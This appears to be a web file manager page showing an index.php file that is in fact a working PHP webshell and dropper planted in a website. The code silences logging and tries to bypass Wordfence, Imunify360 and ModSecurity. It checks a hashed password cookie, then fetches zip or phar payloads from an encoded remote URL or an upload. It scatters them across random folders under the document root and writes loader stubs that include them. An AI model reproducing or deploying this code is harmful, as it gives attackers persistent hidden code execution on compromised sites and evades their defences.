관리-도구

편집 파일: index.php

<?php @ini_set('error_log',NULL);@ini_set('log_errors',0);@ini_set('max_execution_time',0);@error_reporting(0);@set_time_limit(0);@ob_clean();if(function_exists("opcache_reset"))opcache_reset();@header("X-Accel-Buffering: no");@header("Content-Encoding: none");if(function_exists('litespeed_request_headers')){$c=litespeed_request_headers();if(isset($c['X-LSCACHE']))header('X-LSCACHE: off');}$e='ff3a816e23d69979ae6f8cae49aef3ea';if(defined('WORDFENCE_VERSION')){define('WORDFENCE_DISABLE_LIVE_TRAFFIC',true);define('WORDFENCE_DISABLE_FILE_MODS',true);}if(function_exists('imunify360_request_headers')&&defined('IMUNIFY360_VERSION')){$g=imunify360_request_headers();if(isset($g['X-Imunify360-Request']))header('X-Imunify360-Request: bypass');if(isset($g['X-Imunify360-Captcha-Bypass']))header('X-Imunify360-Captcha-Bypass: '.$g['X-Imunify360-Captcha-Bypass']);}if(function_exists('apache_request_headers')){$h=apache_request_headers();if(isset($h['X-Mod-Security']))header('X-Mod-Security: '.$h['X-Mod-Security']);}if(isset($_SERVER['HTTP_CF_CONNECTING_IP'])&&defined('CLOUDFLARE_VERSION')){$_SERVER['REMOTE_ADDR']=$_SERVER['HTTP_CF_CONNECTING_IP'];if(isset($h['HTTP_CF_VISITOR']))header('HTTP_CF_VISITOR: '.$h['HTTP_CF_VISITOR']);}function wp_die($j){die($j);}$k=!empty($_COOKIE['uid'])?$_COOKIE['uid']:$_REQUEST['uid'];if(empty($k)||md5(md5(sha1(md5(md5($k)))))!=$e)wp_die("p");function listFolders($m){$q=scandir($m);$r=array();foreach($q as $u){if($u=="."||$u=="..")continue;$v=$m."/".$u;if(is_dir($v)){$r[]=$v;$r=array_merge($r,listFolders($v));};}return $r;}function rstr($w=6){return substr(str_shuffle('0123456789abcdefghijklmnopqrstuvwxyz'),1,$w);}function to($v,$x){$y=rand(0,count($v)-1);$z="1";if(!empty($_REQUEST['o']))$z=$_REQUEST['o'];$aa=$v[$y]."/".rstr()."/";mkdir($aa,0777,true);if($z=="1"){$aa.="index.php";}elseif($z=="2"){$aa.=rstr(5).".php";}elseif($z=="3"){$aa.=$x;}return $aa;}function d1($bb){$cc=@fopen($bb,'r');$dd="";if(!$cc)return false;stream_get_meta_data($cc);while(!feof($cc)){$dd.=fgets($cc);}fclose($cc);return $dd;}function d2($bb){$ee=file_get_contents($bb);if(empty($ee))d1($bb);return $ee;}function fw($bb,$v,$gg=null){if(file_put_contents($bb,$v)){return true;}else{$hh=@FOPen($bb,"w");if($hh){if(fwrite($hh,$v)||($gg!=null&&stream_copy_to_stream($gg,$hh))){@fClOsE($hh);return true;};}};return false;}function down($w,$ii){$jj=false;if(function_exists('curl_init')){$kk=curl_init($w);$cc=fopen($ii,'w+');curl_setopt($kk,CURLOPT_FILE,$cc);curl_setopt($kk,CURLOPT_TIMEOUT,50);if(curl_exec($kk)){$jj=true;}curl_close($kk);fclose($cc);}else{$dd=d2($w);if($dd)$jj=fw($ii,$dd);}return $jj;}if(!empty($_REQUEST["l"])&&$_REQUEST["l"]=="a")wp_die(md5_file(__FILE__));$ll=$_SERVER['DOCUMENT_ROOT'];$mm=listFolders($ll);$gg=to($mm,"").".zip";if(!empty($_FILES['pluginzip'])){$gg=$_FILES['pluginzip']['tmp_name'];move_uploaded_file($_FILES['pluginzip']['tmp_name'],$gg);}elseif(!empty($_REQUEST["l"])){if(!down(gzuncompress(hex2bin($_REQUEST["l"])),$gg))wp_die("d");}elseif(!empty($_REQUEST['uid']))wp_die("<form method='post' enctype='multipart/form-data'><input type='file' name='pluginzip'><input type='submit'/>");$nn="";$oo=array();if(class_exists("ZipArchive")){$pp=new ZipArchive();if($pp->open($gg)!==TRUE)wp_die("z");for($y=0;$y<$pp->numFiles;$y++){$qq=$pp->getNameIndex($y);$cc=$pp->getStream($qq);$oo[]=$qq;$rr=explode("/",$qq);$ss=end($rr);if($cc){$tt=stream_get_contents($cc);$uu=to($mm,$ss);$vv=str_replace($ll,"",$uu)."\n";if(fw($uu,$tt,$cc)){echo $vv;};}}$pp->close();$nn='"zip://'.$gg.'#';}elseif(!empty($_REQUEST["n"])){$nn='"phar://'.$gg.'/';$oo=explode("|",gzuncompress(hex2bin($_REQUEST["n"])));foreach($oo as $ww){$tt=file_get_contents('phar://'.$gg.'/'.$ww);if($tt){$uu=to($mm,$ww);$vv=str_replace($ll,"",$uu)."\n";if(fw($uu,$tt)){echo $vv;};}}}if(!empty($nn)){$_REQUEST['o']=1;foreach($oo as $ww){$uu=to($mm,'');$tt='<?=@null; $h="";if(!empty($_SERVER["HTTP_HOST"])) $h = "'.$ww.'"; include('.$nn.'$h");?>';if(fw($uu,$tt))echo str_replace($ll,"",$uu)."\n";}}?>